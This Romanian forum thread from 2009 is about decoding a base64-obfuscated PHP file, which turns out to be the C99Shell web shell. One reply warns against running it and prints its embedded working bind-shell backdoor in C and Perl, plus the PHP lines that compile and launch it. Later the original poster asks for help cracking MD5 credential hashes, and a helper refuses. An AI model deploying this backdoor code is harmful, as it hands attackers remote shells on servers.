Second Opinion
Folosind serviciul second opinion ne puteți trimite RMN-uri, CT -uri, angiografii, fișiere .pdf, documente medicale. Astfel vă vom putea da o opinie neurochirurgicală, fără ca aceasta să poată înlocui un consult de specialitate. Răspunsurile vor fi date prin e-mail în cel mai scurt timp posibil (de obicei în mai putin de 24 de ore, dar nu mai mult de 48 de ore). Second opinion – Neurohope este un serviciu gratuit. www.neurohope.ro |
Decodare fisiere
Last Updated: Feb 07 2009 09:23, Started by
Dyshka69
, Feb 04 2009 23:30
·
0
#1
Posted 04 February 2009 - 23:30
As dorii si eu daca poate cineva sa imi decodeze 2 fisiere codate in base64 ...eu am incercat fara succes .... cele pe care le-am atasat .. merci in avans ..
Attached Files |
#2
Posted 04 February 2009 - 23:59
e simplu. Chestie de 2-3 minute
Hai ca mi-am facut mila de tine Am atasat mai jos fisierul decodat. ATENTIE!!! Fisierul decodat este raportat de Avira ca fiind un virus (PHP/C99Shell.C). decodat.php 97.65K 27 downloads |
#4
Posted 05 February 2009 - 01:37
Dyshka69, esti sigur ca vrei sa rulezi fisierul ala?
o simpla rulare ar putea compromite un server linux. Are niste fisiere PERL si C++ criptate tot cu base64 Spre exemplu la linia 1585: cf("/tmp/bd.c",$port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); $_POST['cmd']="ps -aux | grep bd"; $port_bind_bd_c este ceva de genul: #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> int main(argc,argv) int argc; char **argv; { int sockfd, newfd; char buf[30]; struct sockaddr_in remote; if(fork() == 0) { remote.sin_family = AF_INET; remote.sin_port = htons(atoi(argv[1])); remote.sin_addr.s_addr = htonl(INADDR_ANY); sockfd = socket(AF_INET,SOCK_STREAM,0); if(!sockfd) perror("socket error"); bind(sockfd, (struct sockaddr *)&remote, 0x10); listen(sockfd, 5); while(1) { newfd=accept(sockfd,0,0); dup2(newfd,0); dup2(newfd,1); dup2(newfd,2); write(newfd,"Password:",10); read(newfd,buf,sizeof(buf)); if (!chpass(argv[2],buf)) system("echo welcome to r57 shell && /bin/bash -i"); else fprintf(stderr,"Sorry"); close(newfd); } } } int chpass(char *base, char *entered) { int i; for(i=0;i<strlen(entered);i++) { if(entered[i] == '\n') entered[i] = '\0'; if(entered[i] == '\r') entered[i] = '\0'; } if (!strcmp(base,entered)) return 0; } cat si un script perl initilizat la linia 1593 (inteligenta metoda... daca C++ nu merge incearca perl ) cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); $_POST['cmd']="ps -aux | grep bdpl"; #!/usr/bin/perl $SHELL="/bin/bash -i"; if (@ARGV < 1) { exit(1); } $LISTEN_PORT=$ARGV[0]; use Socket; $protocol=getprotobyname('tcp'); socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n"; setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n"; listen(S,3) || die "Cant listen port\n"; while(1) { accept(CONN,S); if(!($pid=fork)) { die "Cannot fork" if (!defined $pid); open STDIN,"<&CONN"; open STDOUT,">&CONN"; open STDERR,">&CONN"; exec $SHELL || die print CONN "Cant execute $SHELL\n"; close CONN; exit 0; } } |
#6
Posted 05 February 2009 - 12:32
este deja decodat (vezi postul #2).
ce altceva mai vrei? |
#7
Posted 05 February 2009 - 23:29
darkangelbv, on Feb 5 2009, 01:37, said: Dyshka69, esti sigur ca vrei sa rulezi fisierul ala? o simpla rulare ar putea compromite un server linux. Are niste fisiere PERL si C++ criptate tot cu base64 Spre exemplu la linia 1585: cf("/tmp/bd.c",$port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); $_POST['cmd']="ps -aux | grep bd"; $port_bind_bd_c este ceva de genul: #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> int main(argc,argv) int argc; char **argv; { int sockfd, newfd; char buf[30]; struct sockaddr_in remote; if(fork() == 0) { remote.sin_family = AF_INET; remote.sin_port = htons(atoi(argv[1])); remote.sin_addr.s_addr = htonl(INADDR_ANY); sockfd = socket(AF_INET,SOCK_STREAM,0); if(!sockfd) perror("socket error"); bind(sockfd, (struct sockaddr *)&remote, 0x10); listen(sockfd, 5); while(1) { newfd=accept(sockfd,0,0); dup2(newfd,0); dup2(newfd,1); dup2(newfd,2); write(newfd,"Password:",10); read(newfd,buf,sizeof(buf)); if (!chpass(argv[2],buf)) system("echo welcome to r57 shell && /bin/bash -i"); else fprintf(stderr,"Sorry"); close(newfd); } } } int chpass(char *base, char *entered) { int i; for(i=0;i<strlen(entered);i++) { if(entered[i] == '\n') entered[i] = '\0'; if(entered[i] == '\r') entered[i] = '\0'; } if (!strcmp(base,entered)) return 0; } cat si un script perl initilizat la linia 1593 (inteligenta metoda... daca C++ nu merge incearca perl ) cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); $_POST['cmd']="ps -aux | grep bdpl"; #!/usr/bin/perl $SHELL="/bin/bash -i"; if (@ARGV < 1) { exit(1); } $LISTEN_PORT=$ARGV[0]; use Socket; $protocol=getprotobyname('tcp'); socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n"; setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n"; listen(S,3) || die "Cant listen port\n"; while(1) { accept(CONN,S); if(!($pid=fork)) { die "Cannot fork" if (!defined $pid); open STDIN,"<&CONN"; open STDOUT,">&CONN"; open STDERR,">&CONN"; exec $SHELL || die print CONN "Cant execute $SHELL\n"; close CONN; exit 0; } } Ruleaza deja pe acest site ... ca de aici este ... Edited by Dyshka69, 05 February 2009 - 23:31. |
#8
Posted 07 February 2009 - 00:16
Dyshka69, on Feb 5 2009, 23:29, said: Ruleaza deja pe acest site ... ca de aici este ... STIU CA E AIUREA ... DAR AS VREA CA CINEVA SA IMI DECODEZE ACESTE 2 FISIERE IAR SI SA LE LASE CU NUMELE LOR si sa decripteze si acest username si parola // Login & password crypted with md5 $name='6171124cf9a629261c48f2706cdc9326'; $pass='c9fa12d3165965c34c65545636916101'; eu nu am reusit Attached FilesEdited by Dyshka69, 07 February 2009 - 00:40. |
#9
Posted 07 February 2009 - 00:38
#10
Posted 07 February 2009 - 00:41
astea 2 fisiere sunt IDENTICE. TU ai probleme cu vederea?
Din primele 2 pe care le-ai uploadat doar UNUL este criptat. Si anume "caring.php" care l-am uploadat cu numele de "decodat.php" |
|
#11
Posted 07 February 2009 - 00:46
DarkAngelBv, on Feb 7 2009, 00:41, said: astea 2 fisiere sunt IDENTICE. TU ai probleme cu vederea? Din primele 2 pe care le-ai uploadat doar UNUL este criptat. Si anume "caring.php" care l-am uploadat cu numele de "decodat.php" decodeaza si i acel user si aceea parola ,,, pls PS AM OBSERVAT ACUM CA FUNCTIONS SI CARING SUNT LA FEL ) Edited by Dyshka69, 07 February 2009 - 00:56. |
#12
Posted 07 February 2009 - 03:33
User-ul si parola sunt criptate cu MD5.
MD5 este un tip de hash-uire one-way. adica odata criptat nu mai poate fi refacut in forma initiala. Mai multe despre md5 gasesti pe wikipedia http://en.wikipedia.org/wiki/MD5 Sa inteleg ca ai furat scriptul de undeva si nu sti user-ul si parola. Ei bine, as putea sa te ajut, dar nu o voi face. Daca esti baiat inteligent poti trece simplu de user-ul si parola criptata. |
#13
Posted 07 February 2009 - 09:23
Nu e furat ... Si nu e de la admin ... asta e un fel de siguranta a celui ce a facut scriptul si de acolo intra si sterge baza de date la site ... si altele .....
|
Anunturi
▶ 0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users